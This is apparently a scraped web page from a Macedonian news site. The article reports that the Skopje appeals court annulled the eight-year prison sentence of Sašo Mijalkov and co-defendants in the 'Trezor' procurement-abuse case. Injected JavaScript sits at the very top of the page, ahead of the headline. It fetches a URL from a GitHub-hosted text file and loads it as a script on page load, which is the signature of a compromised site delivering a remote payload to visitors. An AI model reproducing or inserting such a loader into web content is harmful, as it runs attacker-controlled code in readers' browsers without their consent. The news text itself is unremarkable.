;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Апелација укина пресуда за Мијалков со која требаше да лежи 8 години во затвор и во буџетот да се вратат 860 илјади евра - Антропол
АктуелноЛокално

Апелација укина пресуда за Мијалков со која требаше да лежи 8 години во затвор и во буџетот да се вратат 860 илјади евра

Сашо Мијалков по година ипол од изречената осум годишна казна затвор, доби ослободување за случајот „Трезор“. Скопска Апелација, го врати предметот на повторно судење. Сметаат дека има суштествени повреди. Одлуката нема да биде јавно достапна, велат од судот, додавајќи дека тоа е пракса.

„Укината е пресудата и вратено на повторно судење. Тоа е поради суштествени повреди на постапката поради што се доведува во прашање фактичката состојба и примената на законот. Причините се во одлуката. Одлуките со кои се укинуваат пресуди не се анонимизираат. Нема да биде достапна одлуката за јавноста“, велат од Апелација за „А1он“.

Со укинувањето на оваа пресуда, сега ослободени се и поранешниот началник на Петтата управа во МВР Горан Грујевски кој доби 15 години затвор, а е во бегство. Ослободен е и поранешниот шеф на неговиот кабинет, Тони Јакимовски, кому му беше изречена казна затвор од пет години. На поранешниот помошник-министер во МВР Небојша Стајковиќ, судот му изрече затвор во траење од пет години, но и тој е сега слободен граѓанин.

Ослободителната пресуда доаѓа иако Кривичниот суд утврди дека обвинетите ги сториле кривичните дела за кои се гонат. Умислено ги сториле делата. Четворицата беа прогласени за виновни, бидејќи судот цени дека тројцата го сториле кривичното дело злоупотреба на службената положба и овластувања, а Тони Јакимовски е осуден за помагање. Според обвинението, во овој случај се злоупотребени над 860 илјади евра, кои требаше да ги вратат во државниот буџет. Укинатата пресуда ја донесе судечкиот совет на Кривичен, чиј претседател беше Џенета Бектовиќ.

Предметот се однесуваше за набавка на опрема за УБК/МВР и услуги, преку која е оштетен буџетот.

Сите заедно ја искористиле службената положба и овластување. Тони Јакимовски им помогнал и прибавиле имотна корист и нанеле имотна штета на буџетот на РМ. За да набават опрема за потребите на УБК/МВР, прво, второ и третообвинетиот оствариле состанок со претставниците на ГАМА во Обединето кралство и набавиле опрема за потребите на УБК. Во текот на подготовките за набавка на опремата, одлучиле опремата да ја набават преку фирмата ФИНЗИ ДООЕЛ Скопје. Договорено било набавката да се изврши преку ова лице, кое Жарко Луковски и Сашо Мијалков го користеле за реализација на зделки.

Обвинетите Сашо Мијалков и Горан Грујевски, усно наложиле на Ѓоко Поповски да започне со постапка за набавка на опрема од ФИНЗИ ДООЕЛ Скопје. Тој изготвил покана, а од ФИНЗИ ДООЕЛ Скопје испратиле понуда. Од страна на службите на УБК е изготвен договор од УБК/МВР за купување на опремата. Потоа, склучен е договор за купопродажба. Иако немало потреба за одржување на телекомуникациската опрема, било направен допис до МВР дека е потребно да се одржува набавената опрема и тоа да продолжи да го прави ФИНЗИ ДООЕЛ Скопје. Доставена е покана до фирмата, а тие доставиле понуда со спецификација за временски период од две години. Помеѓу МВР и ФИНЗИ е склучен договор за извршување на услуги, за да му се плаќа авансен паушал“, рече судијката Џенета Бектовиќ, која ја изрече пресудата која сега е укината.

  • Текстот е превземен од a1on.mk